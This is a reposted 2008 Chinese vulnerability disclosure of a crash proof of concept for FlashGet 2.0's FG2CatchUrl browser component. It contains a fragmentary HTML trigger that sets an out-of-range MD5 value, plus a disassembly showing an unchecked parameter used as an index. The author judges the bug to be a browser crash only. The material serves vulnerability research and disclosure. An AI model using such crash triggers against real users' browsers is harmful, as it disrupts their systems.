又见0day! [FlashGet]-FG2CatchUrl Crash POC

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

又见0day! [FlashGet]-FG2CatchUrl Crash POC

来源：ph4nt0m@googlegroups.com 作者：kook1991 发布时间：2008-04-24

FlashGet 2.0 正式版的0day 早在2.0bate版就有这个BUG 当时发现了但是比较忙就扔下了

今天看见出正式版了下载回来试了一下软件更新 BUG犹在于是乎把POC放出来

<html>

<title>[FlashGet]-FG2CatchUrl Crash POC (0Day)</title>

'bug owner:kook1991

Vulnerable.MD5 -99999999

</script>

</html>

036F9BE6 56 push esi

036F9BE7 57 push edi

036F9BE8 33C0 xor eax, eax

036F9BEA 8D7D 13 lea edi, dword ptr [ebp+13]

036F9BED AA stos byte ptr es:[edi]

036F9BEE 8A81 BC377003 mov al, byte ptr [ecx+37037BC] ; ECX是传入的参数没有经过处理

036F9BF4 6A FF push -1

036F9BF6 8845 12 mov byte ptr [ebp+12], al

036F9BF9 8D45 12 lea eax, dword ptr [ebp+12]

036F9BFC 50 push eax

036F9BFD E8 9980FFFF call 036F1C9B

感觉没有办法利用只能当掉浏览器也许是本人技术有限希望牛人们继续深入一下

注：幻影收发，转载请注明出处

[

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

推荐广告